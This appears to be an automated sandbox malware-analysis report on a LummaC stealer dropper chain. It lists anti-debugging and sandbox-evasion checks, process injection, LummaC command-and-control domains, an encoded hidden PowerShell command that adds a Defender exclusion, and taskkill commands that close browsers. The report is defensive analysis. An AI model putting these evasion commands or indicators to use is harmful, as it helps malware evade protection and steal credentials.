                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: 7620ab885d.exe, 00000009.00000003.2061994993.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2175548971.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2186071731.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154759324.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf0'
                    Source: b285303eae.exe, 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: cMTqzvmx9u.exe, 00000000.00000003.1468954895.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
                    Source: DJj.exe, 00000010.00000002.2490197433.00000000007D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2314083807.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2139126772.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2223018332.0000000001162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW w
                    Source: e6e4c20fad.exe, 0000001F.00000003.3161625986.000000000BFBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: cMTqzvmx9u.exe, 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, 7620ab885d.exe, 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmp, b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmp, b285303eae.exe, 0000001B.00000001.2507127937.0000000000287000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: CodeIntegrityInformation
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeThread information set: HideFromDebugger
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_04DB0D7B rdtsc 0_2_04DB0D7B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100E110 LdrInitializeThunk,9_2_0100E110
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B3652B mov eax, dword ptr fs:[00000030h]0_2_00B3652B
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: 0_2_00B3A302 mov eax, dword ptr fs:[00000030h]0_2_00B3A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C0A302 mov eax, dword ptr fs:[00000030h]2_2_00C0A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C0652B mov eax, dword ptr fs:[00000030h]2_2_00C0652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C0A302 mov eax, dword ptr fs:[00000030h]3_2_00C0A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C0652B mov eax, dword ptr fs:[00000030h]3_2_00C0652B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Encrypted powershell cmdline option found
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\hubert\AppData\Roaming\r3yhfqlfwevGCAOVPFS'
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath 'C:\Users\hubert\AppData\Roaming\r3yhfqlfwevGCAOVPFS'
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeMemory written: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe base: 400000 value starts with: 4D5A
                    LummaC encrypted strings found
                    Source: 7620ab885d.exeString found in binary or memory: tentabatte.lat
                    Source: 7620ab885d.exeString found in binary or memory: curverpluch.lat
                    Source: 7620ab885d.exeString found in binary or memory: bashfulacid.lat
                    Source: 7620ab885d.exeString found in binary or memory: manyrestro.lat
                    Source: 7620ab885d.exeString found in binary or memory: slipperyloo.lat
                    Source: 7620ab885d.exeString found in binary or memory: talkynicer.lat
                    Source: 7620ab885d.exeString found in binary or memory: shapestickyr.lat
                    Source: 7620ab885d.exeString found in binary or memory: wordyfindy.lat
                    Source: 7620ab885d.exeString found in binary or memory: observerfry.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: rapeflowwj.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: crosshuaht.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: sustainskelet.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: aspecteirs.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: energyaffai.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: necklacebudi.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: discokeyus.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: grannyejh.lat
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315235248.0000000000741000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: cheapptaxysu.click
                    Source: 7ddd2a748c.exe, 00000011.00000002.2368631259.0000000002409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                    Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                    Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                    Source: b285303eae.exe, 0000001B.00000003.2521099628.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: treehoneyi.click
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaaab1agiazqbyahqaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcahiamwb5aggazgbxagwazgb3aguadgbhaemaqqbpafyauabgafmajwa=
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden -encodedcommand qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaccaqwa6afwavqbzaguacgbzafwaaab1agiazqbyahqaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcahiamwb5aggazgbxagwazgb3aguadgbhaemaqqbpafyauabgafmajwa=
                    Source: 8469cb4d4d.exe, 0000000A.00000002.2315387552.000000000090E000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: BProgram Manager
                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: 7620ab885d.exe, 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: GProgram Manager
                    Source: b285303eae.exe, 0000001B.00000002.2818926847.0000000000287000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: Program Manager
                    Source: skotes.exe, skotes.exe, 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: WpProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe VolumeInformationJump to behavior
